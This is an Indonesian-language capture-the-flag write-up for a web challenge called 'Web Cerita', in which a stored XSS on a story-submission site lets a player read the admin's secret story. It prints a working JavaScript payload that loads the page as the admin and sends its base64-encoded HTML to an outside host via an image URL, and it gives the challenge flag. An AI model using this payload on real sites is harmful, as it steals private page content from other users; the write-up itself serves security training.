# Web Cerita

# Deskripsi

    tim ccug membuat sebuah platform yang dimana pengunjung bisa membuat sebuah cerita karangan dan terdapat halaman bantuan jika pengunjung kesulitan untuk mengarang cerita atau memilih judul. Tetapi admin dari tim ccug mempunyai cerita yang sangat menarik untuk dibaca, bisakah kamu membaca cerita yang dibuat admin dari tim ccug?

# Solusi

Ditantangan ini peserta diminta untuk melakukan eksploitasi terhadap kerentanan XSS Stored yang dimana hasil dari pesan yang dikirimkan peserta akan ditampilkan di halaman admin, peserta diminta juga untuk membuat sebuah payload xss untuk mencuri flag yang berada pada halaman cerita dari user admin dengan melakukan leak source html dari perspektif admin

    <script>
        var http = new XMLHttpRequest();
        http.open('GET', '');
        http.onreadystatechange = function() {
            document.write('<img src="http://server-peserta.com/?source=' + btoa(this.responseText) + '">');
        };
        http.send();
    </script>

flag : hackfest{do'a_mimin_diijabah_oleh_yang_maha_kuasa_kenapa?_karena_kamu_berhasil_mendapatkan_flagnya:)}